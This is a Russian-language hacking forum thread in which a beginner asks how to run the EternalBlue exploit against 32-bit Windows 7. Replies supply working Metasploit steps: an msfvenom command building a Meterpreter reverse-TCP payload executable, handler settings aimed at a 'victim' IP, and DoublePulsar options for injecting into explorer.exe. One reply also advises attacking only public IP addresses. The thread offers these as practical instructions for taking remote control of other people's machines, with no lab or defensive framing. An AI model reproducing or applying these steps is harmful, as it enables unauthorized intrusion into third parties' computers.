• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Проблема Kali Linux: Eternalblue x86

Sagain2

Sagain2

New member
30.04.2019
4
0
(Ребята, только не бейте, я новичек)
Даров, хацкеры. У меня тут возник вопрос. Большая часть эксплоитов в metasploit-framework заточены под windows (7) x64
Теперь встречный вопрос, есть ли эксплоит для windows 7 x86? Пол инета облазил не нашел.
Ну или есть его заменители?
 
R

rdh_x

Well-known member
26.03.2018
48
3
Генеришь нагрузку
Bash:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.X.X >> payload.exe
Далее в msfconsole
Bash:
use exploit/multi/handler
set lhost <твой ip>
set rhost <ip жертвы>
set payload windows/meterpreter/reverse_tcp
run
 
R

rdh_x

Well-known member
26.03.2018
48
3
Прошу прощения, изначально подумал что неправильно понял вопрос и удалил свой правильный ответ.

Для 32-бит есть Doublepulsar, в настройках сплоита
Код:
set targetarcheticture x84
И нужно изменить processinject, попробуйте поэксперементировать с разными процессами, я пробовал explorer.exe но иногда соединение падало.
Код:
set processinject explorer.exe
Также на некоторых процессах нельзя повысить привилегии.
И соответственно вместо
Код:
set payload windows/x64/meterpreter/reverse_tcp
Нужно
Код:
set payload windows/meterpreter/reverse_tcp
 
s unity

s unity

Премиум
18.09.2019
110
8
Прошу прощения, изначально подумал что неправильно понял вопрос и удалил свой правильный ответ.

Для 32-бит есть Doublepulsar, в настройках сплоита
Код:
set targetarcheticture x84
И нужно изменить processinject, попробуйте поэксперементировать с разными процессами, я пробовал explorer.exe но иногда соединение падало.
Код:
set processinject explorer.exe
Также на некоторых процессах нельзя повысить привилегии.
И соответственно вместо
Код:
set payload windows/x64/meterpreter/reverse_tcp
Нужно
Код:
set payload windows/meterpreter/reverse_tcp
В мсфконсоли нет даблпульсара "из коробки". Нужно идти на гитхаб и оттуда брать. Вообще лучше загуглить куда его кидать храниться и как использовать.
 
s unity

s unity

Премиум
18.09.2019
110
8
Знаешь че скажу, забей КУЙ на это. Почти все пейлоды работают только в локалке. С пробросом портов за nat такоооой геморой.... что это не стоит того. Можно пробовать бомбить ТОЛЬКО по белым ип.
Но раз на то пошло, то где ты там увидел, что все идет под x64?! Наоборот x64 прям редко. Вообще этерналблю и туда и туда, просто нужно заходить в exploit и читать подробную инфу типа:
#show info
#show payloads (список нагрузок, там и х86, там и х64)
#show targets (в основном список доступных ОС)
# и так далее.. почти каждая строчка это изменяемый параметр.

Вообще советую познакомиться с SEARCHSPLOIT.
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб